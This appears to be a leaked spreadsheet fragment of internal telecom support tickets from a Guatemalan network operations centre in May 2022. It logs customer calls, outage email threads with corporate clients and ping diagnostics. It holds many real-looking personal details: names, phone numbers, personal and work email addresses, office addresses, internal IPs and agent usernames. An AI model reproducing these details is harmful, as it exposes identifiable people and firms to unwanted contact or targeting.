    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL SERVICIO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 17:00
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; SANTAMARIA, ANGELO &lt;ANGELO.SANTAMARIA@CITI.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; BRICENO, LISETH &lt;LISETH.BRICENO@CITI.COM&gt;; PISAREK, MALGORZATA &lt;MALGORZATA.PISAREK@CITI.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; GARCIA ORTEGA, EDWARD MARTIN &lt;EDWARD.GARCIA@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;
CC: SERVICENOW NOTIFICATIONS &lt;SERVICENOW.NOTIFICATIONS@CITI.COM&gt;; ECCNETOPS &lt;ECCNETOPS.NOTIFICATIONS@CITI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ENRIQUEZ, ROLANDO &lt;ROLANDO.ENRIQUEZ@CITI.COM&gt;; COOPER, FABIOLA CAROLINA &lt;FABIOLA.CAROLINA.COOPER@CITI.COM&gt;; SANTANA, JOSE &lt;JOSE.SANTANA@CITI.COM&gt;
ASUNTO: RE: INC0104385987 #P1 [SINGLE-THREADED - LATAM/HONDURAS - IN COUNTRY CONNECTIVITY SINGLE-THREADED DUE TO CLARO CIRCUIT FAILURE - RHNBDK69-T4B01-4451] OSPF PASSIVE
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4567063</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR OSWALDO QUIEN INDICA QUE ESTARA VALIDANDO CON PR Y NOS ESTARA RESPONDIENDO POR CORREO **
ID 3001058442
**</t>
  </si>
  <si>
    <t>F4567082</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DEL ENLACE
COMMAND PING FOR NODE CC_BANCO_AZTECA_GT_CHIQUIMULLLA_Z3 (10.212.190.245)
TOOLS: ERROR, TOOL 'PING' FAILED WITH EXIT CODE 1.
PING 10.212.190.245 (10.212.190.245) 56(84) BYTES OF DATA.
--- 10.212.190.245 PING STATISTICS ---
3 PACKETS TRANSMITTED, 0 RECEIVED, 100% PACKET LOSS, TIME 12009MS</t>
  </si>
  <si>
    <t>F4567115</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PABLO MOÑOZ 56327392 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001090829</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO MOÑOZ 56327392 NO RESPONDE, ENVIA  A BUZON SE INTENTARA LUEGO **
-ID 3001105306
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO MUÑOZ 56327392  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001138541
**</t>
  </si>
  <si>
    <t>F4567118</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 79247490 SANTOS MENCIONA QUE YA TIENEN 3 DIAS SIN ENERGIA ELECTRICA EN PR
-ID 3001093477</t>
  </si>
  <si>
    <t>F4567127</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BARRERA 56300178 MENCIONA QUE AUN NO HA RECIBIDO EL CORREO
SE CONFIRMA CON CLIENTE QUE EL CORREO ES -- SISTEMAS@INTERAMERCON.COM --
-ID 3001099339</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE SERGIO BARRERA 56300178 CONFIRMA LOS PERMISOS PARA PERSONAL TECNICO
-ID 3001102020</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 8:31
PARA: SISTEMAS@INTERAMERCO.COM &lt;SISTEMAS@INTERAMERCO.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | TECH TRADE S.A.|465300014T| 5 AV. 15-45 Z.10 EDIFICIO CENTRO EMPRESARIAL TORRE II OF. 201-202 GUATEMALA.
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO TECH TRADE S.A.|465300014T| 5 AV. 15-45 Z.10 EDIFICIO CENTRO EMPRESARIAL TORRE II OF. 201-202 GUATEMALA.
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
NOMBRE                                                                            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QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ESTARA RESPONDIENDO EL CORREO CON LOS PERMISOS AUTORIZADOS
-ID 3001099339</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 9:54
PARA: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; SISTEMAS@INTERAMERCON.COM &lt;SISTEMAS@INTERAMERCON.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | TECH TRADE S.A.|465300014T| 5 AV. 15-45 Z.10 EDIFICIO CENTRO EMPRESARIAL TORRE II OF. 201-202 GUATEMALA.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4567129</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS MENDEZ AL 47682113  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001140662
**</t>
  </si>
  <si>
    <t>F4567133</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A TELMEX CON PRUEBAS ---**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 02:20
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100044T::: TICKET CNOC IMBBL003937::: "FUERA DE SERVICIO"
ESTIMADO SR. CARRILLO
                PERSONAL A CARGO NOS COMENTA QUE DESDE NUESTRO LADO NO SE OBSERVAN EVENTOS Y EL SERVICIO SE MANTIENE ESTABLE.
PING -C 1500 -S 1500 -M 50 -B -VPN-INSTANCE INTERNET_GT_DEPTAL 10.105.67.18
  PING 10.105.67.18: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.105.67.18 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/14 MS
PODRÍA APOYARNOS COMPARTIENDO UNA TRAZA PARA PODER REALIZAR MÁS PRUEBAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE EL SERVICIO YA ESTA OPERATIVO PERO TIENEN FLAPEO Y NO LE TIENEN GESTION AL ROUTER, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001072783</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 16:37
PARA: JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100044T::: TICKET CNOC IMBBL003937::: "FUERA DE SERVICIO"
*-*-*-*-*</t>
  </si>
  <si>
    <t>***---  CL REPORTA QUE CONTINUA CON INESTABILIDAD --*-
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 01:07
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100044T::: TICKET CNOC IMBBL003937::: "FUERA DE SERVICIO"
BUENOS DÍAS ESTIMADO SR. CARRILLO.
                LAMENTAMOS LOS INCONVENIENTES, SE SOLICITA APOYO AL PERSONAL DEL CNOC CLARO.
ESPERAMOS COMPARTIR AVANCES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 01:02
PARA: GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100044T::: TICKET CNOC IMBBL003937::: "FUERA DE SERVICIO"
BUEN DIA TEAM
POR FAVOR AYÚDENNOS A REVISAR EL SERVICIO MÁS A FONDO YA QUE CONTINUA  CON FLAPEOS , QUEDAMOS AL PENDIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>SE NOTIFICA VIA CORREO
SOLICITUD DE SOPORTE ::: ID LOCAL 426100044T::: TICKET CNOC IMBBL003937::: "FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>SE ENVIA CORREO INFORMANDO QUE EL SERVICIO SE OBSERVA ACTIVO
SOLICITUD DE SOPORTE ::: ID LOCAL 426100044T::: TICKET CNOC IMBBL003937::: "FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>F4567137</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 10:35
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DA-NI-PLANTA-INDUSTRIAS CARNICAS-ICI-CONDEGA ID: 4584236
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4567143</t>
  </si>
  <si>
    <t>NOS ATIENDE MARVIN INDICA QUE AUN PRESENTAN INTERFERENCIA CON LAS LLAMADAS, YA LO ESCALARON CON EL PROVEEDOR Y DE PARTE DE ELLOS NO ENCONTRARON NINGUN PROBLEMA</t>
  </si>
  <si>
    <t>SE VALIDA GERSON RAMIREZ 79223310
##LLAMADA DESED VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE GERSON RAMIREZ 79223310
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567145</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE CRISTIAN CURIALES 24182428 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001118389 - 300118474</t>
  </si>
  <si>
    <t>F4567146</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRYAN GOMEZ AL 47705598  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001099575 - 3001099725
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN GOMEZ 47705598  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001120649</t>
  </si>
  <si>
    <t>CLIENTE BRYAN GOMEZ 47705598 APOYA UBICANDO EQUIPO ASMI52 ALARMADO, LO REINICIA PERO CONTINÚA EN EL MISMO ESTADO. SE ABRIRÁ WO PARA LA REVISIÓN. LLAMADA DESDE VIVO
ASMI52
PWR     VERDE
ALM     ROJO
SYNC    ROJO</t>
  </si>
  <si>
    <t>F4567150</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE, NOS ATIENDE LA OPERADORA, NOS MANTIENE EN LINEA MIENTRAS NOS COMUNICA CON CARLOS FUENTES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567160</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN CALDERON 50011192 SUENA DESCONECTADO, SE INTENTARA LUEGO
-ID 3001094916 - 3001095359</t>
  </si>
  <si>
    <t>F4567167</t>
  </si>
  <si>
    <t>SE RETOMA EN ESTE MOMENTO- SE LLAMA A CLIENTE  BYRON ZETINO-47432973-  ## SE TIENE EN LINEA
3001567398
COLA:
NOMBRE: A: 47432973
NÚMERO: 47432973
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 47432973
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 09:54:00</t>
  </si>
  <si>
    <t>SE HA LLAMDO A CLIENTE  BYRON ZETINO-47432973  NUEVAMENTE ##CLEINTE NO CONTESTA##ENVIA A BUZON ##VIVO ## SE LLAMO 1 VEZ</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE  BYRON ZETINO-47432973 ## NO CONTESTA ##ENVIA A BUZON ##VIVO ## SE LLAMARON 2 VECES##</t>
  </si>
  <si>
    <t>RESUMEN:
SE HABLA CON EJECUTIVO ANDREA URRUELA   Y LIDER JUAN MANUEL  SE LE EXPLICA QUE NOSOTROS COMO AREA DE FALLAS NO HEMOS REALIZADO NINGUN TIPO DE MANIPULACION CON LOS EQUIPOS DEL CLIENTE.
SE TOMA ESTOS PUNTOS DE REFERENCIA:
*CLEINTE  BYRON ZETINO-47432973-42395059 AYER INDICO QUE REPORTO  QUE NO TENIA LLAMADAS EN NINGUNA VIA
*AYER CON EL SERVICIO DE TELEFONIA UNICAMENTE SE REALIZO MEDICION DE FIBRA CON AOYO DE EQUIPO HUAWEI ONT EN PR# NO SE MANIPULO EQUIPOS DEL CLIENTE
*HOY CLIENTE CONFIRMA NUEVAMENTE QUE NO TEIENE LLAMADAS ENTRANTES-SALIENTES Y ENTRE EXXTENSIONES DESDE EL DIA DE AYER
*CLIENTE SE LE PIDO APOYO PARA QUE SI  EL TUVIERA PERMISO DE APLICAR RESET, LE APLICARA. SINO ESCALARA CON SU PROVEEDOR POR QUE NO TENIAMOS RESPUESTA DE PBX, POR LO QUE CLIENTE INDICO QUE APLICARIA EL RESET-
*DEBIDO A QUE NO RESTABELCIO SERVICIO, SE MANDO A CERTIFICAR
*TECNICO EN PR INDICO QUE AL MOMENTO DE LLEGAR, PERSONAL DE SOPORTE DE CL  LE INDICO A TEC QUE QUE PBX Y EQUIPOS DE CLIENTE DE INTERNET ESTABAN RESETEADOS POR DEFAULT
*TECNICO AL MOMENTE DE CERTIFICAR QUITA CABLE DE PBX PARA CONECTAR SU EQUIPO LAPTOP  PARA PROCEDER CON CERTIFICACION# (UNICAMENTE MANIPULACION SE TUVO DE ESTE CABLE, PARA PODER CONECTARNOS CON LA LAPTOP PARA CERTIFICAR)
###CLEITNE DEBE ESCALAR CON EJECUTIVO</t>
  </si>
  <si>
    <t>## CLEINTE ESTA APLICANDO RESET A SU PBX ##</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BYRON ZETINO-47432973 PARA BRINDAR RETROALIMENTACION
-ID 3001125362</t>
  </si>
  <si>
    <t>##CLIENTE NOS COMENTA QUE EL DIA DE AYER NO TENIAN NI SEÑAL PARA LLAMADAS ENTRE EXTENSIONES ## CLIENTE APLICA NUEVAMENTE REINICIO DEBIDO A QUE SIGUE SIN TELEFONIA EN TODAS LAS VIAS, POR LO QUE  SE LE CONTACTARA EN 30 MINUTOS ##
NOTA: SI SERVICO NO RESTABLECE- SE REALIZARA VISITA DE CERTIFICACION ##</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE  BYRON ZETINO-47432973-42395059 CONFIRMA QUE YA ESTAN LOS PERMISOS + QUE EL ESTARA APOYANDO PARA CERTIFICACION ## COMENTA QUE TIENE LAS CREDENCIALES
3001766494
COLA:
NOMBRE: A: 42395059
NÚMERO: 42395059
DURACIÓN: 0:01:08
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42395059
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 11:55:45</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE, EN ESPERA DE RESPUESTA-
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 9:06
PARA: BYRON.ZETINO@KOLEKTOCENTER.COM &lt;BYRON.ZETINO@KOLEKTOCENTER.COM&gt;; GIOVAZ19@HOTMAIL.COM &lt;GIOVAZ19@HOTMAIL.COM&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: GDN 22135800 || KOLEKTO, SOCIEDAD ANONIMA
BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
GDN 22135800
KOLEKTO, SOCIEDAD ANONIMA
5 AVENIDA 15-45 OFICINA 305, ZONA 10 GUATEMALA GUATEMALA, TORRE 2
SOLICITO SU AMABLE APOYO PARA TRAMITAR LOS PERMISOS CORRESPONDIENTES HACIA NUESTROS POSIBLES TÉCNICOS QUE LLEGARÁN EL DÍA DE HOY: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FAVOR CONFIRMAR POR ESTE MEDIO CUANDO YA ESTEN LOS PERMISOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>## SE LLAMAA  A CLEINTE   BYRON ZETINO-47432973 ## INDICA QUE NO RESTABLECIO EL SERVICIO ##LLAMADAS ENTRANTES, SALIENTES NI ENTRE EXTENSIONES##SOLICITA CERTIFICACIAON
##
3001689442
COLA:
NOMBRE: A: 47432973
NÚMERO: 47432973
DURACIÓN: 0:00:33
ESTADO: CONECTADA
DETALLES: 47432973
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 19/05/2022 11:02:03</t>
  </si>
  <si>
    <t>##SE SIGUE EN LINEA CON CLIENTE##</t>
  </si>
  <si>
    <t>CLIENTE INFORMA QUE YA ESTAAN LOS PERMISOS,, SE APERTURA WO
DE: GIOVANNI ZETINO &lt;GIOVAZ19@HOTMAIL.COM&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 9:15
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; BYRON.ZETINO@KOLEKTOCENTER.COM &lt;BYRON.ZETINO@KOLEKTOCENTER.COM&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: GDN 22135800 || KOLEKTO, SOCIEDAD ANONIMA
LOS PERMISOS YA ESTAN CONFIRMADOS REGISTRARSE EN RECEPCION DEL EDIFICIO
QUEDAMOS ATENTOS A SU PRONTA VISITA POR FAVOR
SALUDOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BYRON ZETINO-47432973  || SE TIENE EN LINEA
3001068205
COLA:
NOMBRE: A: 47432973
NÚMERO: 47432973
DURACIÓN: 0:00:43
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47432973
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 08:30:54
3001068476
COLA:
NOMBRE: A: 42395059
NÚMERO: 42395059
DURACIÓN: 0:07:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42395059
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 08:38:52</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE ## ENE SPERA DE ACCESOS ##
NOTA: CLIENTE CONFIRMO QUE POSEE CREDENCIALES PARA CERTI
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 9:06
PARA: BYRON.ZETINO@KOLEKTOCENTER.COM &lt;BYRON.ZETINO@KOLEKTOCENTER.COM&gt;; GIOVAZ19@HOTMAIL.COM &lt;GIOVAZ19@HOTMAIL.COM&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: GDN 22135800 || KOLEKTO, SOCIEDAD ANONIMA
BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
GDN 22135800
KOLEKTO, SOCIEDAD ANONIMA
5 AVENIDA 15-45 OFICINA 305, ZONA 10 GUATEMALA GUATEMALA, TORRE 2
